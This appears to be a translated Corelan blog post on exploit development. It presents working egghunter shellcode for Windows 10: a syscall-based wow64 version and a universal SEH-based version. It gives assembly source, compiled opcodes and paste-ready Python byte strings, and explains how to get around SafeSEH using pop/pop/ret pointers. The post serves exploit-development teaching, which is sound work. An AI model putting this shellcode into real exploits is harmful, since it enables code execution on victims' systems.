引言

好吧，我要坦白一件事：我一直对egghunter有些着迷。但这并不意味着我喜欢使用（或滥用）egghunter仅仅因为我喜欢它的功能。事实上，我认为如果可能的话，尽量避免使用egghunter是一个好习惯，因为它们往往会减慢速度。

我的意思是，我一直对在不使进程崩溃的情况下搜索内存的技术很着迷。这只是个人喜好，不太重要。

真正重要的是Corelan Team回来了。好吧，是我回来了。这是我近3年来的第一篇（技术）文章，也是自Corelan Team在那之前"逐渐消失"以来的第一篇文章。（事实上，我很好奇（部分）原始Corelan团队成员是否能够再次找到空闲时间，联手开始进行/发布一些研究。我当然希望如此，但让我们看看会发生什么。）

正如你们中的一些人已经知道的，我最近离开了我的日常工作。（说来话长，这篇文章太长。很高兴在喝酒时分享细节。）我创办了一家名为"Corelan Consulting"的新公司，并试图通过漏洞开发培训和网络安全咨询谋生。培训进展顺利，2019年几乎已排满，并且已经在规划2020年的课程。你可以在这里找到培训时间表。如果你有兴趣在公司或会议上设立Corelan Bootcamp或Corelan高级课程——请先阅读推荐信，然后联系我 :) 我仍然需要提高与锁定咨询工作相关的销售技巧，但我相信最终一切都会好起来的。（是的，如果你想与我合作，请联系我，我可以兼职从事治理/风险管理和评估工作；-））

无论如何，在构建2019年版Corelan Bootcamp，更新Windows 10材料时，我意识到Lincoln编写的Windows 7的wow64 egghunter在Windows 10上不再工作。事实上，我有点预期它会失败，因为我们已经知道Microsoft在每个主要Windows版本中都会更改系统调用号。由于最常用的egghunter机制基于系统调用的使用，很明显更改号码会破坏egghunter。

顺便说一句：系统调用（及其号码）在这里有文档记录：https://j00ru.vexillium.org/syscalls/nt/64/（感谢Mateusz “j00ru” Jurczyk）。你可以在上述网站的表格中找到"NtAccessCheckAndAuditAlarm"系统调用号的演变。

无论如何，更改系统调用号听起来并不太令人兴奋或困难，但也很清楚，参数和堆栈布局、系统调用在Windows 10中的行为也与Windows 7版本不同。

我们发现一些win10 egghunter PoC在流传，但发现它们在真实漏洞利用中不可靠。Lincoln看了一会儿，进行了一些调试，并产生了Windows 10的工作版本。:)

所以，这意味着我们很自豪能够宣布一个适用于Windows 10的（wow64）egghunter。以下版本已在真实漏洞利用和目标中测试。

wow64 egghunter for Windows 10

如前所述，挑战在于找出新系统调用期望其参数的位置和方式，它如何更改寄存器和堆栈以确保参数始终在正确的位置，并提供预期的功能：测试给定页面是否可访问，并且在此过程中不使进程死亡。

这是更新后的例程：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

"\x33\xD2"              #XOR EDX,EDX
"\x66\x81\xCA\xFF\x0F"  #OR DX,0FFF
"\x33\xDB"              #XOR EBX,EBX
"\x42"                  #INC EDX
"\x52"                  #PUSH EDX
"\x53"                  #PUSH EBX
"\x53"                  #PUSH EBX
"\x53"                  #PUSH EBX
"\x53"                  #PUSH EBX
"\x6A\x29"              #PUSH 29  (system call 0x29)
"\x58"                  #POP EAX
"\xB3\xC0"              #MOV BL,0C0
"\x64\xFF\x13"          #CALL DWORD PTR FS:[EBX] (perform the system call)
"\x83\xC4\x10"          #ADD ESP,0x10
"\x5A"                  #POP EDX
"\x3C\x05"              #CMP AL,5
"\x74\xE3"              #JE SHORT
"\xB8\x77\x30\x30\x74"  #MOV EAX,74303077
"\x8B\xFA"              #MOV EDI,EDX
"\xAF"                  #SCAS DWORD PTR ES:[EDI]
"\x75\xDE"              #JNZ SHORT
"\xAF"                  #SCAS DWORD PTR ES:[EDI]
"\x75\xDB"              #JNZ SHORT
"\xFF\xE7"              #JMP EDI

这个egghunter在Windows 10上工作得很好，但它假设你在wow64环境中运行（64位操作系统上的32位进程）。当然，正如Lincoln在他的博客文章中所解释的，你可以简单地添加一个检查来确定体系结构，并使egghunter在本地32位操作系统上也能工作。

你也可以用mona.py生成这个egghunter——只需运行!mona egg -wow64 -winver 10

在调试这个egghunter（或任何使用系统调用的wow64 egghunter）时，你会注意到系统调用执行期间发生访问冲突。这些访问冲突可以安全地通过，并将由操作系统处理……但调试器每次看到访问冲突时都会中断。（本质上，当代码尝试测试不可读的页面时，调试器将中断。换句话说，你会得到大量的访问冲突，需要你手动干预。）

如果你使用Immunity Debugger，你可以简单地告诉调试器忽略访问冲突。为此，单击"debugging options"，并打开"exceptions"选项卡。在"Add range"下添加以下十六进制值：

1
2

0xC0000005 – ACCESS VIOLATION
0x80000001 – STATUS_GUARD_PAGE_VIOLATION

当然，当你完成调试egghunter后，不要忘记再次删除这两个异常 :-)

展望未来

当然，MS有权在其操作系统中更改他们想要的任何内容。我认为开发人员不应该自己发出系统调用，我相信他们应该改用ntdll.dll中的包装函数。换句话说，MS更改系统调用号应该是"安全的"。我不知道每个Windows版本系统调用号递增的背后是什么，而且我不知道系统调用号是否会永远保持不变，因为Windows 10已被标记为"最后一个Windows版本"。从egghunter的角度来看，那将是很棒的。随着越来越多的人采用Windows 10，egghunter也将具有越来越高的成功率。但实际上，我不知道这是否是一个有效的假设。

无论如何，这让我思考：是否有一种不同的技术可以使egghunter工作，而不使用系统调用？如果是这样，该技术是否也适用于旧版本的Windows？如果我们不使用系统调用，它是否可以直接在本地x86和wow64环境中工作？

让我们看看。

异常处理

关于egghunter的原始论文（“Safely Searching Process Virtual Address Space”）由skape撰写（2004年！）已经介绍了使用自定义异常处理程序来处理访问冲突，如果你尝试从不可访问的页面读取，就会发生访问冲突。通过使处理程序指向egghunter内部，egghunter将能够继续运行。不幸的是，原始实现似乎不再有效。在进行一些测试时（许多年前，以及最近在Windows 10上），看起来操作系统不允许你使异常处理程序直接指向堆栈（没有尝试堆堆，但我期望存在相同的限制）。换句话说，如果egghunter从堆栈或堆运行，你将无法使egghunter使用自身作为异常处理程序并继续运行。

在查看可能的解决方案之前，让我们提醒自己异常处理机制是如何工作的。当操作系统看到异常并决定将其传递给进程中的相应线程时，它将指示ntdll.dll中的一个函数在该线程内启动异常处理机制。此例程将检查偏移量0处的TEB（可通过FS:[0]访问），并检索堆栈上异常处理链中最顶层的记录的地址。每个记录由2个字段组成：

1
2
3
4

struct EXCEPTION_REGISTRATION {
   EXCEPTION_REGISTRATION *nextrecord; // pointer to next record (nseh)
   DWORD handler; // pointer to handler function
};

最顶层的记录包含将首先调用的例程的地址，以检查应用程序是否可以处理异常。如果该例程失败，将尝试链中的下一个记录（直到其中一个例程能够处理异常，或者将使用默认处理程序，将进程发送到天堂）。所以，换句话说，ntdll.dll中的例程将找到记录，并调用"handler"地址（即放置在记录第二个字段中的任何内容）。

所以，将其转化为egghunter世界：如果我们想保持对异常发生时的控制，我们将不得不创建一个自定义的"最顶层"SEH记录，确保在egghunter执行期间它始终是最顶层的记录，并且我们必须使记录处理程序指向一个允许我们的egghunter继续运行并处理下一页的例程。同样，如果我们的"自定义"记录是最顶层的记录，我们将确保它将是第一个被使用的记录。

当然，我们应该小心，并考虑运行异常处理机制的后果和影响：

• 异常处理机制将更改ESP的值。该功能将在新的ESP位置创建一个"异常分发器堆栈"帧，其中指向原始SEH帧的指针位于ESP+8。我们必须"撤消"对ESP的此更改，以确保我们使其指回堆栈上egghunter存储其数据的区域。
• 接下来，我们还应该避免一直创建新记录。相反，我们应该尝试继续使用相同的记录，避免一直将数据推送到堆栈，避免我们耗尽堆栈空间。此外，当然，egghunter需要能够从内存中的任何位置运行。
• 最后，我们作为"SE处理程序"（记录的第二个字段）放置的任何内容都必须与SAFESEH兼容。不幸的是，这是我"解决方案"的弱点。此外，如果SEHOP处于活动状态，我的例程将不起作用。（但据我所知，在客户端系统上默认不活动。）

创建我们自己的自定义SEH记录意味着我们将向堆栈写入一些内容，覆盖/损坏已经存在的内容。所以，如果你的egghunter/shellcode也在该位置附近的堆栈上，你可能需要在运行egghunter之前调整ESP。只是提醒一下 :)

这是我的基于SEH的egghunter的样子（准备用nasm编译）：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

; Universal SEH based egg hunter (x86 and wow64)
; tested on Windows 7 & Windows 10
; written by Peter Van Eeckhoutte (corelanc0d3r)
; www.corelan.be - www.corelan-training.com - www.corelan-consulting.com
;
; warning: will damage stack around ESP
;
; usage: find a non-safeseh protected pointer to pop/pop/ret and put it in the placeholder below
;

[BITS 32]
CALL $+4			; getPC routine
RET
POP ECX
ADD ECX,0x1d			; offset to "handle" routine

;set up SEH record
XOR EBX,EBX
PUSH ECX			; remember where our 'custom' SE Handler routine will be
PUSH ECX			; p/p/r will fly over this one
PUSH 0x90c3585c			; trigger p/p/r again :)
PUSH 0x44444444			; Replace with P/P/R address  ** PLACEHOLDER **
PUSH 0x04EB5858			; SHORT JUMP
MOV DWORD [FS:EBX],ESP		; put our SEH record to top of chain

JMP nextpage

handle:				; our custom handle
	SUB ESP,0x14		; undo changes to ESP
	XOR EBX,EBX
	MOV DWORD [FS:EBX],ESP	; make our SEH record topmost again
	MOV EDX, [ESP+24]	; pick up saved EDX
	INC EDX

nextpage:
	OR DX, 0x0FFF
	INC EDX
	MOV [ESP+24], EDX	; remember where we are searching
	MOV EAX, 0x74303077	; w00t
	MOV EDI, EDX
	SCASD
	JNZ nextpage+5
	SCASD
	JNZ nextpage+5
	JMP EDI

让我们看看egghunter的各个组件。

首先，hunter以一个"GetPC"例程开始（旨在找到其在内存中的绝对地址），然后是一条指令，该指令将0x1d字节添加到它能够使用该GetPC例程检索到的地址。添加此偏移量后，ECX将包含实际"handler"例程在内存中的绝对地址（在上面代码中由标签"handle"引用）。请记住，egghunter需要能够在运行时动态确定此位置，因为egghunter将使用异常处理机制返回自身并继续运行egghunter。这意味着我们需要知道（确定）它在哪里，将引用存储在堆栈上，以便我们可以在异常处理机制期间稍后"检索/跳转"到它。

接下来，代码正在创建一个新的自定义SEH记录。虽然SEH记录只包含2个字段，但代码实际上将5个特殊构建的值推送到堆栈上。只有最后2个将成为SEH记录，其他用于允许异常处理程序恢复ESP并继续执行egghunter。让我们看看推送了什么以及为什么：

• PUSH ECX：这是"handle"例程在内存中的地址，由之前的GetPC例程确定。异常处理程序最终需要返回到这个地址。
• PUSH ECX：我们再次推送地址，但这个不会被使用。我们将使用pop/pop/ret指针两次。第一次将用于异常处理程序将执行带回我们的代码，第二次它将用于返回到存储在堆栈上的"ECX"。这第二个ECX只是为了补偿p/p/r中的第二个POP。你可以在堆栈上推送任何你喜欢的东西。
• PUSH 0x90c3585C：此代码将被执行。这是一个POP ESP、POP EAX、RET。这将把堆栈重置回我们在堆栈上存储SEH记录的原始位置。RET将执行转移回堆栈上的p/p/r指针（SEH记录的一部分）。换句话说，p/p/r指针将被使用两次。第二次，它最终将返回到存储在堆栈上的ECX地址。（参见之前的PUSH ECX指令）

接下来，通过将另外2个值推送到堆栈来创建真正的SEH记录：

• 指向P/P/R的指针（必须是非safeseh保护的指针）。我们必须使用p/p/r，因为我们不能使此处理程序字段直接指向堆栈（或堆）。由于我们不能只是让异常机制直接返回我们的代码，我们将使用pop/pop/ret来保持对执行流的控制。在上面的代码中，你必须用非SafeSEH保护的pop/pop/ret的地址替换0x44444444值。然后，当异常发生时（即当egghunter到达不可访问的页面时），pop/pop/ret将第一次被触发执行，返回到SEH记录第一个字段中的4个字节。
• 在SEH记录的第一个字段中，我放置了2个pops和一个短跳转向前序列。这将稍微调整堆栈，使指向SEH记录的指针位于堆栈顶部。接下来它将跳转到之前推送到堆栈上的指令序列（0x90C3585C）。如前所述，该序列将再次触发POP/POP/RET，最终将返回到存储的ECX指针（即egghunter所在的位置）。

为了完成SEH记录的创建并将其标记为最顶层的记录，我们只需将其位置写入TEB。由于我们的新自定义SEH记录当前位于ESP，我们可以简单地将ESP的值写入偏移量0处的TEB（MOV DWORD [FS:EBX],ESP）。（这就是我们首先清除EBX的原因。）

此时，egghunter已准备好测试页面是否可读。代码将使用EDX作为读取的参考。例程首先转到页面末尾（OR DX, 0x0FFF），然后转到下一页的开头（INC EDX），然后我们将EDX的值存储在堆栈上（在[ESP-4]），以便异常处理程序稍后可以拾取它。如果读取尝试（SCASD）失败，将触发访问冲突。访问冲突将使用我们的自定义SEH记录（因为它应该是最顶层的记录），并且该例程旨在恢复egghunter的执行（通过运行"handle"例程，该例程最终将从堆栈恢复EDX指针并继续处理下一页）。“handle"例程将：

• 再次调整堆栈，将其位置更正为运行egghunter时的位置。（SUB ESP,0x14）
• 接下来，它将确保我们的自定义记录再次是最顶层的SEH记录（只是预期某些其他代码可能添加了新的最顶层记录）。
• 最后，它将从堆栈中拾取一个引用（我们存储了我们尝试访问的最后一个地址）并继续（处理下一页）。

如果页面可读，egghunter将检查标签的存在，两次。如果找到标签，最终的"JMP EDI"将告诉CPU运行双标签后放置的代码。

在调试egghunter时，你会注意到它会抛出访问冲突（当代码尝试访问不可访问的页面时）。当然，在这种情况下，这些访问冲突是绝对正常的，但你仍然必须将异常传递回应用程序（Shift F9）。你也可以配置Immunity Debugger自动忽略（并传递）异常，但配置Exceptions。为此，单击"debugging options”，并打开"exceptions"选项卡。在"Add range"下添加以下十六进制值：

1
2

0xC0000005 – ACCESS VIOLATION
0x80000001 – STATUS_GUARD_PAGE_VIOLATION

当然，当你完成调试egghunter后，不要忘记再次删除这两个异常。

为了使用egghunter，你需要首先将asm指令转换为操作码。为此，你需要安装nasm。（我使用了来自https://www.nasm.us/pub/nasm/releasebuilds/2.14.02/win32/的Win32安装程序）

将上面的asm代码片段保存到文本文件中（例如"c:\dev\win10_egghunter_seh.nasm"）。接下来，运行"nasm"将其转换为包含操作码的二进制文件：

1

"C:\Program Files (x86)\NASM\nasm.exe" -o c:\dev\win10_egghunter_seh.obj c:\dev\win10_egghunter_seh.nasm

接下来，将二进制文件的内容转储为可以在脚本和漏洞利用中使用的十六进制格式：

1

python c:\dev\bin2hex.py c:\dev\win10_egghunter_seh.obj

（你可以在Corelan的github存储库中找到bin2hex.py脚本的副本）

如果一切顺利，你将得到：

1
2
3
4
5
6
7
8
9

"\xe8\xff\xff\xff\xff\xc3\x59\x83"
"\xc1\x1d\x31\xdb\x51\x51\x68\x5c"
"\x58\xc3\x90\x68\x44\x44\x44\x44"
"\x68\x58\x58\xeb\x04\x64\x89\x23"
"\xeb\x0d\x83\xec\x14\x31\xdb\x64"
"\x89\x23\x8b\x54\x24\x24\x42\x66"
"\x81\xca\xff\x0f\x42\x89\x54\x24"
"\x24\xb8\x77\x30\x30\x74\x89\xd7"
"\xaf\x75\xf1\xaf\x75\xee\xff\xe7"

再次，不要忘记用pop/pop/ret的地址替换\x44\x44\x44\x44（第三行末尾）（并且如果你正在编辑字节，则以little endian存储地址 :) ）

Python友好的复制/粘贴代码：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

egghunter = ("\xe8\xff\xff\xff\xff\xc3\x59\x83"
"\xc1\x1d\x31\xdb\x51\x51\x68\x5c"
"\x58\xc3\x90\x68")

egghunter += "\x??\x??\x??\x??" #replace with pointer to pop/pop/ret.  Use !mona seh

egghunter += ("\x68\x58\x58\xeb\x04\x64\x89\x23"
"\xeb\x0d\x83\xec\x14\x31\xdb\x64"
"\x89\x23\x8b\x54\x24\x24\x42\x66"
"\x81\xca\xff\x0f\x42\x89\x54\x24"
"\x24\xb8\x77\x30\x30\x74\x89\xd7"
"\xaf\x75\xf1\xaf\x75\xee\xff\xe7")

我还没有将例程添加到mona.py中（但我会在某个时候最终添加）。当然，如果你看到改进的空间，和/或能够减小egghunter的大小，请不要犹豫让我知道。（在将其添加到mona之前，我会等待你的反馈一段时间。）

当然，我很想知道egghunter是否适用于你，以及它是否跨Windows版本和体系结构（32位系统、旧版Windows等）工作。

就这样吧

感谢阅读！我希望你喜欢这篇全新的文章，我希望你和我一样对未来感到兴奋。

如果你想闲逛、讨论信息安全主题、提问（和回答问题），请注册到我们的Slack工作区。要访问工作区：

• 前往https://www.facebook.com/corelanconsulting（并在你访问时喜欢该页面）。你不需要facebook帐户，该页面是公开的。
• 滚动帖子，查找包含Slack邀请链接的帖子
• 注册，完成。

此外，请随时在Twitter上关注我们（@corelanconsult）以了解新文章和博客文章。

Corelan Training & Corelan Consulting

本文只是你在我们Corelan Bootcamp中学到的一个小例子。如果你想参加我们的Corelan课程，请查看我们的时间表https://www.corelan-training.com/index.php/training-schedules。如果你更喜欢在公司或会议上设立课程，请随时通过此表格联系我。

正如文章开头所解释的：培训和咨询工作现在是我的主要收入来源。只有我能够谋生，我才能免费进行研究和发布信息。本网站由Corelan Consulting支持、托管和资助。我能教的课程越多，我能做的咨询越多，我能投入研究